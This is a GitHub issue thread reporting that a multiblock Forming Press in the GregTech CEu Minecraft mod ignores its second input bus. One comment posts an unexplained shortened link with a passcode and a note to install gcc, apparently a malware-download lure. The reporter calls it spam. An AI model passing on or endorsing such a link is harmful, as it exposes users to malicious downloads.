### ISSUE TITLE
Multi Forming Press not processing

### ISSUE THREAD

**Issue by hgjensen** [GregTechCEu/GregTechCEu-1.19#1900]
### Checked for existing issues

- [X] I have checked for existing issues, and have found none.

### Tested latest version

- [X] I have checked that this occurs on the latest version.

### GregTech CEu Version

1.4.0

### Minecraft Version

1.20.1

### Recipe Viewer Installed

EMI

### Environment

Dedicated Server

### Cross-Mod Interaction

No

### Other Installed Mods

Monifactory 0.8.1

### Expected Behavior

Large Material Press in Forming Press mode.
Two MV input busses with a named "Casting Mold (Name)" in each.
Distinct busses enabled.

Expect that when item is input into the second bus, a named item comes out the output bus.

![image_2024-09-06_081258723](https://github.com/user-attachments/assets/fbea11a2-8ccf-4064-aba4-75682f59178c)

### Actual Behavior

The second bus is not processing anything

### Steps to Reproduce

See previous picture and description

### Additional Information

When swapping the molds around, the problem stays with the input bus.
I.e. the left-most bus works and the next one does not.

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by hgjensen** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

😆 please delete spam
